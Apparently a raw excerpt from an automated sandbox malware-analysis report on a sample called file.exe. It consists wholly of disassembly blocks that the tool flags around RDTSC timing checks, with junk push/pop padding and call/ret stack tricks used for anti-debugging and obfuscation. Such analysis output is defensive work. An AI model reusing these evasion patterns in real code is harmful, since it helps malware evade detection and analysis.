Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A799 second address: 55A7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F40B477E791h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A7C1 second address: 55A86D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B515FBF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F40B515FC00h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F40B515FC08h 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 js 00007F40B515FC06h 0x00000028 je 00007F40B515FC00h 0x0000002e jmp 00007F40B515FBFAh 0x00000033 pop eax 0x00000034 mov dl, cl 0x00000036 lea ebx, dword ptr [ebp+1244F1C7h] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F40B515FBF8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 jmp 00007F40B515FC04h 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F40B515FC02h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55256B second address: 55256F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577ECA second address: 577ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57870A second address: 578710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57887F second address: 57889F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FBFDh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578A06 second address: 578A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578A0F second address: 578A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578CDD second address: 578CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579A3E second address: 579A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F40B515FBFCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579BA3 second address: 579BAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579BAF second address: 579BE8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B515FBFCh 0x00000008 jns 00007F40B515FBF6h 0x0000000e je 00007F40B515FC13h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579BE8 second address: 579BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579BEE second address: 579BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57E4FC second address: 57E514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E794h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57EC08 second address: 57EC0D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FE1D second address: 57FE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FE23 second address: 57FE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FE27 second address: 57FE41 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jng 00007F40B477E794h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FE41 second address: 57FE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FFA8 second address: 57FFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a popad 0x0000000b jmp 00007F40B477E797h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F40B477E796h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549FDE second address: 549FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F40B515FC05h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549FFB second address: 54A002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A002 second address: 54A008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A008 second address: 54A016 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F40B477E786h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A016 second address: 54A023 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A023 second address: 54A02D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B477E786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5862C0 second address: 5862DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F40B515FC09h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585873 second address: 5858A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jp 00007F40B477E786h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jno 00007F40B477E78Eh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b jl 00007F40B477E786h 0x00000021 push edi 0x00000022 pop edi 0x00000023 jne 00007F40B477E786h 0x00000029 popad 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5858A8 second address: 5858AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5858AF second address: 5858BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F40B477E786h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5858BB second address: 5858BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E42 second address: 585E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E46 second address: 585E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E67 second address: 585E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E6D second address: 585E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E71 second address: 585E89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F40B477E792h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E89 second address: 585E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587181 second address: 587185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587211 second address: 587240 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FBFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F40B515FBFCh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F40B515FBFBh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587240 second address: 587284 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E799h 0x00000008 jmp 00007F40B477E793h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 jmp 00007F40B477E795h 0x00000019 pop edi 0x0000001a pop eax 0x0000001b stc 0x0000001c push D6585ED1h 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587284 second address: 587288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587383 second address: 587387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587387 second address: 5873AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F40B515FC0Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push ebx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587E43 second address: 587E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F40B477E78Ch 0x0000000b jbe 00007F40B477E786h 0x00000011 popad 0x00000012 push eax 0x00000013 jbe 00007F40B477E7A3h 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007F40B477E786h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587FB4 second address: 587FD3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B515FC05h 0x00000008 jmp 00007F40B515FBFFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587FD3 second address: 587FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587FD7 second address: 587FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58B8C1 second address: 58B8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58C06C second address: 58C072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E70B second address: 58E733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E798h 0x00000009 popad 0x0000000a jmp 00007F40B477E78Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E733 second address: 58E738 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D4C3 second address: 54D4D0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58ED8C second address: 58ED94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58ED94 second address: 58ED98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58ED98 second address: 58ED9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 594644 second address: 59464E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5937F2 second address: 5937F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59464E second address: 594652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5937F6 second address: 5937FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 594652 second address: 59469E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or bx, 93E1h 0x0000000d push 00000000h 0x0000000f jmp 00007F40B477E790h 0x00000014 cmc 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F40B477E788h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bh, dh 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59469E second address: 5946A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5946A2 second address: 5946A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59560C second address: 59566D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F40B515FBF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F40B515FBF8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov di, cx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F40B515FBF8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 push 00000000h 0x00000048 and bx, 9B11h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 594898 second address: 5948B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F40B477E790h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59566D second address: 595671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 595671 second address: 595677 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59652C second address: 596593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F40B515FBF8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F40B515FBF8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 push 00000000h 0x00000045 mov di, 3F3Bh 0x00000049 xchg eax, esi 0x0000004a jnp 00007F40B515FC00h 0x00000050 pushad 0x00000051 jnp 00007F40B515FBF6h 0x00000057 push edi 0x00000058 pop edi 0x00000059 popad 0x0000005a push eax 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59580C second address: 595812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59851B second address: 598536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5975E5 second address: 5975E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 598536 second address: 59853D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5975E9 second address: 5975EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59872C second address: 598732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B54A second address: 59B54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59A835 second address: 59A839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B54F second address: 59B554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59A839 second address: 59A843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B554 second address: 59B55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59A843 second address: 59A86A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jo 00007F40B515FBF6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F40B515FBF6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B55A second address: 59B5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or bh, FFFFFFE7h 0x0000000d push 00000000h 0x0000000f mov bx, 606Dh 0x00000013 mov dword ptr [ebp+122D1CE3h], ebx 0x00000019 push 00000000h 0x0000001b jmp 00007F40B477E791h 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 pushad 0x00000023 jmp 00007F40B477E797h 0x00000028 push edx 0x00000029 pop edx 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e pop eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B5A7 second address: 59B5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F40B515FBFCh 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D670 second address: 59D676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F62C second address: 59F6A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F40B515FBF8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F40B515FBF8h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f push edi 0x00000040 add ebx, 23DBC9B8h 0x00000046 pop ebx 0x00000047 push 00000000h 0x00000049 add dword ptr [ebp+122D1D79h], edi 0x0000004f jng 00007F40B515FBFCh 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jo 00007F40B515FBF6h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F6A4 second address: 59F6A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E794 second address: 59E7AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A0733 second address: 5A073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F40B477E786h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A184A second address: 5A1850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
